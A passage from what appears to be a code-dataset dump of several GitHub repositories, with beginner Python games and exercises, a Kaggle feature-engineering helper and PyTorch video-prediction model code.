include_dirs=[jq_lib_dir],\n extra_objects=[os.path.join(jq_lib_dir, \".libs/libjq.a\")],\n)\n\nsetup(\n name='jq',\n version='0.1.5',\n description='jq is a lightweight and flexible JSON processor.',\n long_description=read(\"README.rst\"),\n author='Michael Williamson',\n url='http://github.com/mwilliamson/jq.py',\n license='BSD 2-Clause',\n ext_modules = [jq_extension],\n cmdclass={\"build_ext\": jq_build_ext},\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n)\n\n"
}
] | 1 |
panagiotiskalogeridis/exercises | https://github.com/panagiotiskalogeridis/exercises | 3b931e1ab7436e32d1d953fdb10e1df0e439e18f | 89d581be065e33de0bf18d5a4a9505d44c63a056 | 15d4cb30f26d20c81bc777d1b8af2304feeeef31 | refs/heads/master | 2020-04-23T08:26:13.126452 | 2019-02-16T23:00:15 | 2019-02-16T23:00:15 | 171,036,711 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.678966760635376,
"alphanum_fraction": 0.7011070251464844,
"avg_line_length": 20.58333396911621,
"blob_id": "dcb473db1f316d611fab334f57bdacf3a256fb35",
"content_id": "32539038c202327f3a4cabf84d7686595830194e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 12,
"path": "/exercise10.py",
"repo_name": "panagiotiskalogeridis/exercises",
"src_encoding": "UTF-8",
"text": "import urllib\r\nwebpage=raw_input('give the url of a website (eg.www.somepage.sth)')\r\nf=urllib.urlopen(webpage)\r\nhtml=f.read()\r\nsub1=\"</p>\"\r\nsub2=\"<br>\"\r\nsub3=\"href\"\r\na=html.count(sub1)\r\nb=html.count(sub2)\r\nlinks=html.count(sub3)\r\nlinechange=a+b\r\nprint linechange, links\r\n"
},
{
"alpha_fraction": 0.4569152891635895,
"alphanum_fraction": 0.48696595430374146,
"avg_line_length": 23.339448928833008,
"blob_id": "dc7543bedbd931a8fdce6bac235e947a7922f300",
"content_id": "7255015ee7bd6c8144ee86719ae508e921280d3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2762,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 109,
"path": "/exercise7.py",
"repo_name": "panagiotiskalogeridis/exercises",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\n\r\nprint \"The game of tic tac toe.\"\r\nboard=[\" \"]*10\r\nvacantblocks=9\r\n\r\n\r\ndef createboard(board):\r\n print' | |'\r\n print' ' + board[7] + ' | ' + board[8] + ' | ' + board[9]\r\n print' | |'\r\n print'-----------'\r\n print' | |'\r\n print' ' + board[4] + ' | ' + board[5] + ' | ' + board[6]\r\n print' | |'\r\n print'-----------'\r\n print' | |'\r\n print' ' + board[1] + ' | ' + board[2] + ' | ' + board[3]\r\n print' | |'\r\n print \"\\n\"\r\n\r\ndef marks():\r\n mark=''\r\n while not (mark=='X' or mark=='O'):\r\n print('Do you want to be X or O?')\r\n mark= input().upper()\r\n if mark=='X':\r\n return ['X', 'O']\r\n else: return ['O', 'X']\r\n\r\n\r\ndef firstturn():\r\n a=random.randint(1,2)\r\n if a==1:\r\n return \"user\"\r\n else: return \"computer\"\r\n\r\n\r\ndef winner(board):\r\n if (board[1]==board[2]==board[3]==\"X\")or(board[1]==board[2]==board[3]==\"O\"):\r\n return 1\r\n elif (board[4]==board[5]==board[6]==\"X\")or(board[4]==board[5]==board[6]==\"O\"):\r\n return 1\r\n elif (board[7]==board[8]==board[9]==\"X\")or(board[7]==board[8]==board[9]==\"O\"):\r\n return 1\r\n elif (board[7]==board[4]==board[1]==\"X\")or(board[7]==board[4]==board[1]==\"O\"):\r\n return 1\r\n elif (board[8]==board[5]==board[2]==\"X\")or(board[8]==board[5]==board[2]==\"O\"):\r\n return 1\r\n elif (board[3]==board[6]==board[9]==\"X\")or(board[3]==board[6]==board[9]==\"O\"):\r\n return 1\r\n elif (board[7]==board[5]==board[3]==\"X\")or(board[7]==board[5]==board[3]==\"O\"):\r\n return 1\r\n elif (board[1]==board[5]==board[9]==\"X\")or(board[1]==board[5]==board[9]==\"O\"):\r\n return 1\r\n else: return 0\r\n\r\n\r\ndef userplay(board):\r\n moveon=False\r\n while moveon==False:\r\n print \"Give a number between 1 and 9 to mark the block you want\"\r\n marked=input()\r\n if board[marked]==\" \":\r\n moveon=True\r\n board[marked]=mark[0]\r\n return board\r\n else: moveon=False\r\n\r\n\r\ndef computerplay(board):\r\n moveon=False\r\n while moveon==False:\r\n cc=random.randint(1,9)\r\n if board[cc]==\" \":\r\n moveon=True\r\n board[cc]=mark[1]\r\n return board\r\n else: moveon=False\r\n\r\n\r\ncreateboard(board)\r\nmark=marks()\r\nturn=firstturn()\r\n\r\n\r\nwhile vacantblocks>0:\r\n if turn==\"user\":\r\n turn=\"computer\"\r\n userplay(board)\r\n createboard(board)\r\n else:\r\n turn=\"user\"\r\n computerplay(board)\r\n createboard(board)\r\n if winner(board)==1:\r\n vacantblocks=0\r\n else:\r\n vacantblocks=vacantblocks-1\r\n\r\n\r\nif winner(board)==0:\r\n print \"It's a draw\"\r\nelse:\r\n if turn==\"user\":\r\n print \"Computer wins\"\r\n else:\r\n print \"You win!\"\r\n"
},
{
"alpha_fraction": 0.5761467814445496,
"alphanum_fraction": 0.589908242225647,
"avg_line_length": 22.22222137451172,
"blob_id": "4ce76580313018112274ed7ea1aad842dffd9a25",
"content_id": "a787fe768a7e0f22300e109551a013f06bd33660",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1090,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 45,
"path": "/exercise6.py",
"repo_name": "panagiotiskalogeridis/exercises",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\ndef board(a,b,mines):\r\n p=b*\"0\"\r\n g=\"\"\r\n for i in range(0,a):\r\n g=g+(p+'\\n')\r\n g=getmines(g,mines)\r\n print g\r\n\r\ndef getmines(g,mines):\r\n new_list=(list(g))\r\n ties=len(new_list)\r\n newg=\"\"\r\n for i in range(0,mines):\r\n pos=random.randint(0,ties-1)\r\n while new_list[pos]==\"\\n\":\r\n pos=random.randint(0,ties-1)\r\n new_list[pos]=\"X\"\r\n for i in range (0,ties-1):\r\n newg=newg+new_list[i]\r\n g=newg\r\n return g\r\n\r\n\r\n\r\n\r\nprint \"This algorythm creates the board of the game minesweper.\\nGive values greater than zero and create your own board!\"\r\n\r\nheight=input(\"give the board's height:\" )\r\nif height==0:\r\n while height==0:\r\n height=input(\"please give value greater than zero\")\r\n\r\nlength=input(\"give the board's length:\" )\r\nif length==0:\r\n while length==0:\r\n length=input(\"please give value greater than zero\")\r\n\r\nmines=input(\"give the number of mines:\" )\r\nif mines==0:\r\n while mines==0:\r\n mines=input(\"please give value greater than zero\")\r\n\r\nboard(height,length,mines)\r\n"
},
{
"alpha_fraction": 0.32634228467941284,
"alphanum_fraction": 0.35486575961112976,
"avg_line_length": 22.32653045654297,
"blob_id": "0e9614ed2b0f9dbb932d38962714625fe9adf46a",
"content_id": "61f35d5a494e7a5487a0c24e871733bcadccf529",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1192,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 49,
"path": "/exercise1.py",
"repo_name": "panagiotiskalogeridis/exercises",
"src_encoding": "UTF-8",
"text": "def sumintervals(li):\r\n sum=0\r\n a=len(li)\r\n for i in range(0,a):\r\n b=li[i]\r\n for j in range(b[0]+1,b[1]):\r\n b.append(j)\r\n b.sort()\r\n li[i]=b\r\n li.sort()\r\n for i in range (0,a-1):\r\n for j in range (i+1,a):\r\n cell1=li[i]\r\n cell2=li[j]\r\n l1=len(cell1)\r\n if cell1[l1-1]>=cell2[0]:\r\n li[i]=li[i]+li[j]\r\n li[j]=[0]\r\n li.sort()\r\n for j in range (0,a):\r\n if li[j]!=0:\r\n cell=li[j]\r\n cell.sort()\r\n lcell=len(cell)\r\n for i in range (1,lcell):\r\n if cell[i-1]==cell[i]:\r\n cell[i-1]=0\r\n cell.sort()\r\n li[j]=cell\r\n fli=[]\r\n for i in range (0,a):\r\n lkl=len(li[i])\r\n kl=li[i]\r\n if kl[lkl-1]!=0:\r\n fli.append(li[i])\r\n lfli=len(fli)\r\n for i in range (0,lfli):\r\n presum=0\r\n k=fli[i]\r\n lk=len(k)\r\n j=0\r\n while j<=lk:\r\n if k[j]!=0:\r\n presum=k[lk-1]-k[j]\r\n j=lk+1\r\n else:\r\n j=j+1\r\n sum=sum+presum\r\n print sum\r\n"
}
] | 4 |
EEEGUI/Nothing | https://github.com/EEEGUI/Nothing | b7e17835ddcfe963da3fc02623e0e9017710c85d | 933ec529b60b7ad95f09554596d5b5d1e7fe2c6a | fae2a7da50c799c8c67a1bb4bfd9048d7a92473f | refs/heads/master | 2020-04-15T05:55:33.416113 | 2019-01-09T01:03:27 | 2019-01-09T01:03:27 | 164,442,029 | 3 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6099050045013428,
"alphanum_fraction": 0.6099050045013428,
"avg_line_length": 34.82926940917969,
"blob_id": "eec84a6ed0f95e5ba6073314f41d9b31f17ec1ae",
"content_id": "52459eaed088a26cdfa965141003f8f5d03d663e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1474,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 41,
"path": "/feature_engineer.py",
"repo_name": "EEEGUI/Nothing",
"src_encoding": "UTF-8",
"text": "from utils import dataset\nfrom utils import config\nimport pandas as pd\n\n\nclass EloData(dataset.DataSet):\n def __init__(self, df_train, df_test, label_col_name):\n super(EloData, self).__init__(df_train, df_test, label_col_name)\n\n @staticmethod\n def aggregate(df, key, agg_config, col_tag):\n \"\"\"\n df group by key and the aggregate with agg_config\n :param df:\n :param key:\n :param agg_config: dict, eg: {\"colname\": [\"mean\", \"std\", ...]}\n :param col_tag: string, a tag of the df\n :return:\n \"\"\"\n agg_df = df.groupby([key]).agg(agg_config)\n # change the columns of (\"colname\", \"mean\") to \"colname_mean\"\n agg_df.columns = ['_'.join(col).strip() for col in agg_df.columns.values]\n agg_df.reset_index(inplace=True)\n\n count_key_df = df.groupby(key).size().reset_index(name='%s_count' % key)\n\n df = pd.merge(count_key_df, agg_df, on=key, how='left')\n\n df.columns = [col_tag + '_' + c if c != key else c for c in df.columns]\n\n return df\n\n\nif __name__ == '__main__':\n config = config.Config()\n df_train = pd.read_csv(config.TRAIN_PATH)\n df_test = pd.read_csv(config.TEST_PATH)\n df_history = pd.read_csv(config.HISTORY_PATH, parse_dates=[config.PARSE_DATE], nrows=config.NROWS)\n\n elo_data = EloData(df_train, df_test, config.LABEL_COL_NAME)\n print(elo_data.aggregate(df_history, config.KEY, config.HISTORY_AGG_FUNC, config.HISTORY_TAG))\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.52734375,
"alphanum_fraction": 0.5341796875,
"avg_line_length": 25.894737243652344,
"blob_id": "d73e7c8f4f8ce6e3d18a9da640f907b3b1a5d8b2",
"content_id": "269d61ef6d03b53590e7baec2bb2e4b612d0590e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1024,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 38,
"path": "/utils/config.py",
"repo_name": "EEEGUI/Nothing",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nclass Config(object):\n\n ## File Path ##\n\n TRAIN_PATH = 'data/train.csv'\n TEST_PATH = 'data/test.csv'\n HISTORY_PATH = 'data/historical_transactions.csv'\n MERCHANTS_PATH = 'data/merchants.csv'\n NEW_MERCHANT_TRANSACTIONS_PATH = 'data/new_merchant_transactions.csv'\n\n\n ## DataSet ##\n LABEL_COL_NAME = 'target'\n PARSE_DATE = 'purchase_date'\n NROWS = 2000\n KEY = 'card_id'\n\n HISTORY_TAG = 'hist'\n\n\n\n ## Feature engineer ##\n HISTORY_AGG_FUNC = {\n 'category_1': ['nunique'],\n 'category_2': ['mean'],\n 'category_3': ['nunique'],\n 'merchant_id': ['nunique'],\n 'merchant_category_id': ['nunique'],\n 'state_id': ['nunique'],\n 'city_id': ['nunique'],\n 'subsector_id': ['nunique'],\n 'purchase_amount': ['sum', 'mean', 'max', 'min', 'std'],\n 'installments': ['sum', 'mean', 'max', 'min', 'std'],\n 'purchase_date': [np.ptp, 'min', 'max'],\n 'month_lag': ['mean', 'max', 'min', 'std'],\n }\n\n\n"
},
{
"alpha_fraction": 0.5544554591178894,
"alphanum_fraction": 0.5547230243682861,
"avg_line_length": 29.867769241333008,
"blob_id": "2c5c3fac5dc69056022496fe369b6fe5a7d98d90",
"content_id": "c84578c29650965d783c402e4e9fe38db6be0364",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3737,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 121,
"path": "/utils/dataset.py",
"repo_name": "EEEGUI/Nothing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler, Imputer\n\n\nclass DataSet(object):\n def __init__(self, df_train, df_test, label_col_name):\n \"\"\"\n :param df_train:DataFrame, contain the column of label\n :param df_test: Dataframe, don't contain label\n :param label_col_name: string, the name of label\n \"\"\"\n self.label_name = label_col_name\n self.len_train = len(df_train)\n self.len_test = len(df_test)\n self.label = df_train[label_col_name]\n\n df_train = self.drop_cols(df_train, [label_col_name])\n\n self.df_all = pd.concat([df_train, df_test], ignore_index=True)\n\n def merge_data(self, on_key, df_other):\n \"\"\"\n apply agg_config on df_other and then merge df_other with self.df_all on key\n :param on_key: the key(id) in both df_all and df_other\n :param df_other:\n :return:\n \"\"\"\n self.df_all = pd.merge(self.df_all, df_other, on=on_key, how='left')\n\n def process(self):\n \"\"\"\n pipline to process the data set\n override this function\n :return:\n \"\"\"\n pass\n\n def min_max_scale(self, cols_to_scale):\n \"\"\"\n scale self.df\n :param cols_to_scale: list of cols to scale\n :return:\n \"\"\"\n scale = MinMaxScaler()\n\n scale.fit(self.df_all.loc[:, cols_to_scale])\n self.df_all.loc[:, cols_to_scale] = scale.transform(self.df_all.loc[:, cols_to_scale])\n\n def fill_nan(self, dict_strategy):\n \"\"\"\n fill the nan of self.df_all by different strategy\n :param dict_strategy: dict, key:col name, value:strategy; strategy include \"mean\", \"median\", \"most_frequent\",\n int value\n :return:\n \"\"\"\n for key in dict_strategy:\n if type(dict_strategy[key]) is str:\n imputer = Imputer(strategy=dict_strategy[key])\n imputer.fit(self.df_all.loc[key])\n self.df_all.loc[key] = imputer.transform(self.df_all.loc[key])\n elif type(dict_strategy[key]) is int:\n self.df_all.loc[key].fillna(dict_strategy[key])\n else:\n print(\"strategy error\")\n pass\n\n def label_encoding(self, cols_to_encode):\n \"\"\"\n encoding the col with two class\n :param cols_to_encode: list of cols to encode\n :return:\n \"\"\"\n le = LabelEncoder()\n le.fit(self.df_all.loc[cols_to_encode])\n self.df_all.loc[cols_to_encode] = le.transform(self.df_all.loc[cols_to_encode])\n\n def process_datetime(self, cols_of_datetime):\n \"\"\"\n get the year, month, day, weekday from the datetime cols\n :param cols_of_datetime: cols with the type of datetime\n :return:\n \"\"\"\n pass\n\n @staticmethod\n def drop_cols(df, list_cols):\n \"\"\"\n del list_cols from df\n :param df:\n :param list_cols: list, cols to delete\n :return: df without list_cols\n \"\"\"\n return df.drop(labels=list_cols, axis=1)\n\n def makeup_feature(self):\n \"\"\"\n makeup new feature from the original feature\n please override this function\n :return:\n \"\"\"\n pass\n\n def get_df_train(self):\n \"\"\"\n get train data set from the concat of train and test\n :return:\n \"\"\"\n return self.df_all.loc[:self.len_train, :]\n\n def get_df_test(self):\n \"\"\"\n get test data set from the concat of train and label\n :return:\n \"\"\"\n return self.df_all.loc[self.len_train:, :]\n\n def get_label(self):\n \"\"\"\n :return:\n \"\"\"\n return self.label\n\n\n"
}
] | 3 |
edenton/kth_svg_model | https://github.com/edenton/kth_svg_model | 6779f6f30cb4c10c64833b74ce60f82da0725b8f | af3202094d573887f08ca1766adde4d79dafdfd4 | 0eeb3ca6ff9dfe7481fcb4a3a62b3198b2d2bd33 | refs/heads/master | 2021-04-09T12:53:42.438275 | 2018-03-16T21:26:01 | 2018-03-16T21:26:01 | 125,566,109 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.723247230052948,
"alphanum_fraction": 0.723247230052948,
"avg_line_length": 19.769229888916016,
"blob_id": "aa853a08ba8204937fc5cabec7705a88e2b23da3",
"content_id": "00a7dc43e5d143a46db11e5079d69c1851b935f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 13,
"path": "/README.md",
"repo_name": "edenton/kth_svg_model",
"src_encoding": "UTF-8",
"text": "# kth_svglp_model\n\nTo generate from the SVG-FP model run:\n```\npython generate_svg_fp.py\n```\n\nTo generate from the SVG-LP model run:\n```\npython generate_svg_lp.py\n```\n\nGenerated gifs will be saved in logs/svg_fp and logs/svg_lp for SVG-FP and SVG-LP models respectively. \n"
},
{
"alpha_fraction": 0.527694582939148,
"alphanum_fraction": 0.535179615020752,
"avg_line_length": 32.96186447143555,
"blob_id": "3dc36d4696550792ea075cd87ca5c8d7537606b5",
"content_id": "28bf90740896a8ffc0942e3d9884f3d3fecb3ea0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8016,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 236,
"path": "/generate_svg_lp.py",
"repo_name": "edenton/kth_svg_model",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport argparse\nimport os\nimport random\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nimport utils\nimport itertools\nimport progressbar\nimport numpy as np\nfrom scipy.ndimage.filters import gaussian_filter\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', default=100, type=int, help='batch size')\nparser.add_argument('--data_root', default='/misc/vlgscratch3/FergusGroup/denton/data/KTH/processed/', help='root directory for data')\nparser.add_argument('--model_path', default='pretrained_models/kth_svg_lp/model.pth', help='model directory')\nparser.add_argument('--log_dir', default='logs/kth_svg_lp/', help='model directory')\nparser.add_argument('--name', default='', help='additional string for filename')\nparser.add_argument('--seed', default=1, type=int, help='manual seed')\nparser.add_argument('--n_past', type=int, default=10, help='number of frames to condition on')\nparser.add_argument('--n_future', type=int, default=20, help='number of frames to predict')\nparser.add_argument('--num_threads', type=int, default=0, help='number of data loading threads')\nparser.add_argument('--nsample', type=int, default=100, help='number of samples')\nparser.add_argument('--N', type=int, default=256, help='number of samples')\n\n\nopt = parser.parse_args()\nos.makedirs('%s/gifs' % opt.log_dir, exist_ok=True)\n\nopt.n_eval = opt.n_past+opt.n_future\nopt.max_step = opt.n_eval\n\nprint(\"Random Seed: \", opt.seed)\nrandom.seed(opt.seed)\ntorch.manual_seed(opt.seed)\ntorch.cuda.manual_seed_all(opt.seed)\ndtype = torch.cuda.FloatTensor\n\n\n\n# ---------------- load the models ----------------\ntmp = torch.load(opt.model_path)\nlstm = tmp['lstm']\nposterior = tmp['oracle']\nprior = tmp['prior']\nlstm.eval()\nprior.train()\nencoder = tmp['encoder']\ndecoder = tmp['decoder']\n#encoder.eval()\n#decoder.eval()\nlstm.batch_size = opt.batch_size\nposterior.batch_size = opt.batch_size\nprior.batch_size = opt.batch_size\nopt.latent_dim = tmp['opt'].latent_dim\nopt.posterior_dim = tmp['opt'].oracle_dim\n\n# --------- transfer to gpu ------------------------------------\nlstm.cuda()\nposterior.cuda()\nprior.cuda()\nencoder.cuda()\ndecoder.cuda()\n\n# ---------------- set the options ----------------\nopt.dataset = tmp['opt'].dataset\nopt.channels = tmp['opt'].channels\nopt.image_width = tmp['opt'].image_width\n\nprint(opt)\n\n\n# --------- load a dataset ------------------------------------\ntrain_data, test_data = utils.load_dataset(opt)\n\ntrain_loader = DataLoader(train_data,\n num_workers=opt.num_threads,\n batch_size=opt.batch_size,\n shuffle=True,\n drop_last=True,\n pin_memory=True)\ntest_loader = DataLoader(test_data,\n num_workers=opt.num_threads,\n batch_size=opt.batch_size,\n shuffle=True,\n drop_last=True,\n pin_memory=True)\n\ndef get_training_batch():\n while True:\n for sequence in train_loader:\n batch = utils.normalize_data(opt, dtype, sequence)\n yield batch\ntraining_batch_generator = get_training_batch()\n\ndef get_testing_batch():\n while True:\n for sequence in test_loader:\n batch = utils.normalize_data(opt, dtype, sequence)\n yield batch \ntesting_batch_generator = get_testing_batch()\n\n# --------- eval funtions ------------------------------------\n\ndef make_gifs(x, idx):\n # get posterior\n lstm.hidden = lstm.init_hidden()\n posterior.hidden = posterior.init_hidden()\n posterior_gen = []\n posterior_gen.append(x[0])\n x_in = x[0]\n for i in range(1, opt.n_eval):\n h = encoder(x_in)\n h_target = encoder(x[i])\n if type(h) is tuple:\n if i < opt.n_past:\n h, skip = h\n else:\n h, _ = h\n h_target, _ = h_target\n h = h.view(-1, opt.latent_dim).detach()\n h_target = h_target.view(-1, opt.latent_dim).detach()\n z_t, _, _= posterior(h_target)\n if i < opt.n_past:\n lstm(torch.cat([h, z_t], 1)) \n posterior_gen.append(x[i])\n x_in = x[i]\n else:\n h_pred = lstm(torch.cat([h, z_t], 1)).view(opt.batch_size, opt.latent_dim, 1, 1) \n x_in = decoder([[h_pred, skip], []]).detach()\n posterior_gen.append(x_in)\n \n\n nsample = opt.nsample\n ssim = np.zeros((opt.batch_size, nsample, opt.n_future))\n psnr = np.zeros((opt.batch_size, nsample, opt.n_future))\n progress = progressbar.ProgressBar(max_value=nsample).start()\n all_gen = []\n for s in range(nsample):\n progress.update(s+1)\n gen_seq = []\n gt_seq = []\n lstm.hidden = lstm.init_hidden()\n posterior.hidden = posterior.init_hidden()\n prior.hidden = prior.init_hidden()\n x_in = x[0]\n all_gen.append([])\n all_gen[s].append(x_in)\n for i in range(1, opt.n_eval):\n h = encoder(x_in)\n if type(h) is tuple:\n if i < opt.n_past:\t\n h, skip = h\n else:\n h, _ = h\n else:\n skip = []\n h = h.view(-1, opt.latent_dim).detach()\n if i + 1 < opt.n_past:\n h_target = encoder(x[i])\n if type(h_target) is tuple:\n h_target = h_target[0]\n h_target = h_target.view(-1, opt.latent_dim).detach()\n z_t, _, _ = posterior(h_target)\n else:\n z_t, _, _ = prior(h)\n if i < opt.n_past:\n lstm(torch.cat([h, z_t], 1))\n x_in = x[i]\n all_gen[s].append(x_in)\n else:\n h = lstm(torch.cat([h, z_t], 1)).view(opt.batch_size, opt.latent_dim, 1, 1).detach()\n x_in = decoder([[h, skip], []]).detach()\n gen_seq.append(x_in.data.cpu().numpy())\n all_gen[s].append(x_in)\n gt_seq.append(x[i].data.cpu().numpy())\n _, ssim[:, s, :], psnr[:, s, :] = utils.eval_seq(gt_seq, gen_seq)\n\n progress.finish()\n utils.clear_progressbar()\n\n ###### ssim ######\n for i in range(opt.batch_size):\n gifs = [ [] for t in range(opt.n_eval) ]\n text = [ [] for t in range(opt.n_eval) ]\n mean_ssim = np.mean(psnr[i, :, :], 1)\n ordered = np.argsort(mean_ssim)\n for t in range(opt.n_eval):\n # gt \n gifs[t].append(add_border(x[t][i], 'green'))\n text[t].append('Ground\\ntruth')\n #posterior \n if t < opt.n_past:\n color = 'green'\n else:\n color = 'red'\n gifs[t].append(add_border(posterior_gen[t][i], color))\n text[t].append('Approx.\\nposterior')\n # best \n if t < opt.n_past:\n color = 'green'\n else:\n color = 'red'\n sidx = ordered[-1]\n gifs[t].append(add_border(all_gen[sidx][t][i], color))\n text[t].append('Best PSNR')\n # random 3\n for s in range(3):\n sidx = s*20\n gifs[t].append(add_border(all_gen[sidx][t][i], color))\n text[t].append('Random\\nsample %d' % (s+1))\n\n fname = '%s/gifs/best_psnr_%d.gif' % (opt.log_dir, idx+i) \n utils.save_gif_with_text(fname, gifs, text)\n\ndef add_border(x, color, pad=1):\n w = x.size()[1]\n nc = x.size()[0]\n px = Variable(torch.zeros(3, w+2*pad+30, w+2*pad))\n if color == 'red':\n px[0] =0.7 \n elif color == 'green':\n px[1] = 0.7\n if nc == 1:\n for c in range(3):\n px[c, pad:w+pad, pad:w+pad] = x\n else:\n px[:, pad:w+pad, pad:w+pad] = x\n return px\n\nfor i in range(0, opt.N, opt.batch_size):\n x = next(testing_batch_generator)\n make_gifs(x, i)\n print(i)\n\n"
},
{
"alpha_fraction": 0.5862069129943848,
"alphanum_fraction": 0.5911803841590881,
"avg_line_length": 38.86092758178711,
"blob_id": "5f890f424581544c163806622db41236c8b5002d",
"content_id": "9c2cf00a867de9917ff66961922378d2d82ddea2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6032,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 151,
"path": "/models/lstm.py",
"repo_name": "edenton/kth_svg_model",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nclass lstm2(nn.Module):\n def __init__(self, input_size, output_size, hidden_size, batch_size, normalize=False):\n super(lstm2, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n self.embed = nn.Linear(input_size, hidden_size)\n self.lstm0 = nn.LSTMCell(hidden_size, hidden_size)\n self.lstm1 = nn.LSTMCell(hidden_size, hidden_size)\n self.output = nn.Sequential(\n nn.Linear(hidden_size, output_size),\n #nn.BatchNorm1d(output_size),\n nn.Tanh())\n self.hidden = self.init_hidden()\n self.normalize = normalize\n\n def init_hidden(self):\n return [(Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()), \n Variable(torch.zeros(self.batch_size, self.hidden_size).cuda())),\n (Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()), \n Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()))]\n\n def forward(self, input):\n embedded = self.embed(input.view(-1, self.input_size))\n self.hidden[0] = self.lstm0(embedded, self.hidden[0])\n self.hidden[1] = self.lstm1(self.hidden[0][0], self.hidden[1])\n output = self.output(self.hidden[1][0])\n if self.normalize:\n return nn.functional.normalize(output, p=2)\n else:\n return output\n\n\nclass lstm(nn.Module):\n def __init__(self, input_size, output_size, hidden_size, n_layers, batch_size, normalize=False):\n super(lstm, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n self.n_layers = n_layers\n self.embed = nn.Linear(input_size, hidden_size)\n self.lstm = nn.ModuleList([nn.LSTMCell(hidden_size, hidden_size) for i in range(self.n_layers)])\n self.output = nn.Sequential(\n nn.Linear(hidden_size, output_size),\n #nn.BatchNorm1d(output_size),\n nn.Tanh())\n self.hidden = self.init_hidden()\n self.normalize = normalize\n\n def init_hidden(self):\n hidden = []\n for i in range(self.n_layers):\n hidden.append((Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()),\n Variable(torch.zeros(self.batch_size, self.hidden_size).cuda())))\n return hidden\n\n def forward(self, input):\n embedded = self.embed(input.view(-1, self.input_size))\n h_in = embedded\n for i in range(self.n_layers):\n self.hidden[i] = self.lstm[i](h_in, self.hidden[i])\n h_in = self.hidden[i][0]\n\n output = self.output(h_in)\n if self.normalize:\n return nn.functional.normalize(output, p=2)\n else:\n return output\n\n\nclass lstm_prior(nn.Module):\n def __init__(self, input_size, output_size, prior_dim, hidden_size, n_layers, batch_size, normalize=False):\n super(lstm_prior, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n self.n_layers = n_layers\n self.embed = nn.Linear(input_size, hidden_size)\n self.lstm = nn.ModuleList([nn.LSTMCell(hidden_size, hidden_size) for i in range(self.n_layers)])\n self.output = nn.Sequential(\n nn.Linear(hidden_size, output_size),\n #nn.BatchNorm1d(output_size),\n nn.Tanh())\n\n self.mu_net = nn.Linear(hidden_size, prior_dim)\n self.logvar_net = nn.Linear(hidden_size, prior_dim)\n self.hidden = self.init_hidden()\n self.normalize = normalize\n\n def init_hidden(self):\n hidden = []\n for i in range(self.n_layers):\n hidden.append((Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()),\n Variable(torch.zeros(self.batch_size, self.hidden_size).cuda())))\n return hidden\n\n def forward(self, input):\n embedded = self.embed(input.view(-1, self.input_size))\n h_in = embedded\n for i in range(self.n_layers):\n self.hidden[i] = self.lstm[i](h_in, self.hidden[i])\n h_in = self.hidden[i][0]\n\n mu = self.mu_net(h_in)\n logvar = self.logvar_net(h_in)\n output = self.output(h_in)\n if self.normalize:\n output = nn.functional.normalize(output, p=2)\n return output, mu, logvar\n\nclass oracle_lstm(nn.Module):\n def __init__(self, input_size, output_size, hidden_size, batch_size):\n super(oracle_lstm, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n self.embed = nn.Linear(input_size, hidden_size)\n self.lstm = nn.LSTMCell(hidden_size, hidden_size)\n self.mu_net = nn.Linear(hidden_size, output_size)\n self.logvar_net = nn.Linear(hidden_size, output_size)\n self.hidden = self.init_hidden()\n\n def init_hidden(self):\n return (Variable(torch.zeros(self.batch_size, 